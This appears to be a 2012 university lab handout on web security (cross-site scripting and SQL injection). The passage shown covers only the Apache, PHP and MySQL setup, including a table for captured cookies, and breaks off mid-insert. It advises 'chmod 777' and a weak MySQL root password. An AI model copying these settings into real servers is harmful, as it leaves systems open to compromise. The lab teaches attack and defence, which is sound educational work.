1 ECE4112 Internetwork Security Lab 9: Web Security Group Number: ____________ Member Names: _______________________ _______________________ Date Assigned: March 21, 2012 Due Date: March 29, 2012 Please read the entire lab and any extra materials carefully before starting. Be sure to start early enough so that you will have time to complete the lab. Answer ALL questions on the Answer Sheet and be sure you turn in ALL materials listed in the Turn-in Checklist on or before the date due. Goal: This lab will introduce you to several security issues involving web server software and web applications. Summary: In this lab you will be learning about several techniques to attack web applications as well as how to defend against them. First you will learn about “Cross Site Scripting” and use your knowledge to experiment with a cross site scripting exploit. Then, you will learn about SQL injection and use your knowledge to break into a database driven website and then explain how to protect against such attacks. Then we will tie them all together into a practical exercise. Requirements: • Red Hat WS 4 • SPI Dynamics VMware machine Notes: • If you get a blank page when you go to index.php in firefox, make sure all users have read permission for the index.php file (navigate to where the file is located and execute chmod 777 index.php) • When setting up apache2 command addtype in httpd.conf should be AddType application/x-httpd-php .php (there is a space between –php and .php) Section 0: Setup I. Setting up Apache Apache should already be installed on your Red Hat WS 4.0 Machine. If it is not, please follow the directions given in Lab 2. Make sure you have a directory called apache22 somewhere on your machine. Possible locations for this folder are /home/apache2, /usr/local/apache2 or /var/local/apache2. In order to use php, we must modify our server’s configuration file. This file called httpd.conf is located under the apache2 directory (/conf/httpd.conf). The following lines must be added. The best way to add these lines is to search for them in the config file and place them below the commented examples. LoadModule php4_module modules/libphp4.so DirectoryIndex index.html index.html.var index.php (this replaces existing line) AddType application/x-httpd-php .php For reference, an httpd.conf file is placed on nas4112/Lab9/Examples II. Setting up PHP Now that we have our apache server configured, we need to make sure we can interpret a php file located in .../apache2/htdocs. First, locate php.ini (use the locate command; you may have to updatedb before you can). More than likely php.ini is located in /etc/. Open php.ini and set the document root to the path of your htdocs directory. For example, if apache2 is located in /usr/local, then find the line in php.ini starting with doc_root and type the following: doc_root = “/usr/local/apache2/htdocs/” Remember, depending on the location of the apache2 directory, the above line may be different. Once you have completed this task, test out php by creating a sample file in apache2/htdocs called test.php; <?php phpinfo(); ?> Now, restart apache by typing #/apache2/bin/apachectl restart. If you receive an error about libphp4.so module not found, locate the libphp4.so file and copy to /apache2/modules (probably located in /usr/lib/httpd/modules/) Open up a web browser, and type http://localhost/test.php. If you see a page with a lot of information formatted in a nice table, you have succeeded. III. Setting up MySQL To configure MySQL, open a terminal as root and do the following: #service mysqld start #mysqladmin –u root password password3 In this lab, we will be using three databases. One will be used to store captured cookie information, one will be used for a message board, and the third one will be used to store login information. To create each of these databases, we will need to execute the following commands. First get a myslq> prompt by typing mysql –u root –h localhost –p and then password for your password. Type the following commands : NOTE: All sql commands are provided in commands.sql under /Lab9 for your copying pleasure. mysql> create database ece4112; mysql> use ece4112; To create the cookies table: mysql> CREATE TABLE `cookies` ( `id` int(11) NOT NULL auto_increment, `username` varchar(100) NOT NULL default '', `password` varchar(100) NOT NULL default '', PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO_INCREMENT=7 ; mysql> INSERT INTO `cookies` VALUES (6, 'testertest', 'hilohilo'); To create the message board table: mysql> CREATE TABLE `messages` ( `msg_id` int(11) NOT NULL auto_increment, `title` varchar(50) NOT NULL default '', `body` text NOT NULL, PRIMARY KEY (`msg_id`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO_INCREMENT=19 ; mysql> INSERT INTO `messages` VALUES (1, 'Test Message 1', 'This is a test.'); mysql> INSERT INTO `messages` VALUES (2, 'Test Message 2', 'This is another test.'); mysql> INSERT INTO `messages` VALUES (3, 'We love 4112', 'What a great message.'); mysql> INSERT INTO `messages` VALUES (4, '42', 'Meaning of life the universe and everything.'); mysql> INSERT INTO `messages` VALUES (5, 'Hello', 'Hey everyone!'); mysql> INSERT INTO `messages` VALUES (6, 'We need more messages', 'Here is yet another message!'); mysql> INSERT INTO `messages` VALUES (7, 'Yo dude', 'Jeff should type more of these.'); mysql> INSERT INTO `messages` VALUES (8, 'Lalala', 'Typing messages for people.');4 mysql> INSERT INTO `messages` VALUES (9, 'Yet another message', 'Here is a hint. Post a message.'); To create the users table: mysql>CREATE TABLE `users` ( `user_id` int(11) NOT NULL auto_increment, `first_name` varchar(50) NOT NULL default '', `last_name` varchar(50) NOT NULL default '', `address` varchar(50) NOT NULL default '', `city` varchar(50) NOT NULL default '', `state` char(2) NOT NULL default '', `zip` varchar(5) NOT NULL default '', `phone` varchar(10) NOT NULL default '', `email` varchar(50) NOT NULL default '', `password` varchar(8) NOT NULL default 'password', PRIMARY KEY (`user_id`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO_INCREMENT=5 ; mysql>INSERT INTO `users` VALUES (1, 'Jeff', 'Jo', '1008 State Street', 'Atlanta', 'GA', '30318', '4041234567', '[email protected]', 'password'); INSERT INTO `users` VALUES (2, 'Tim', 'Jackson', '342 Hempill Avenue', 'Atlanta', 'GA', '30318', '7704325543',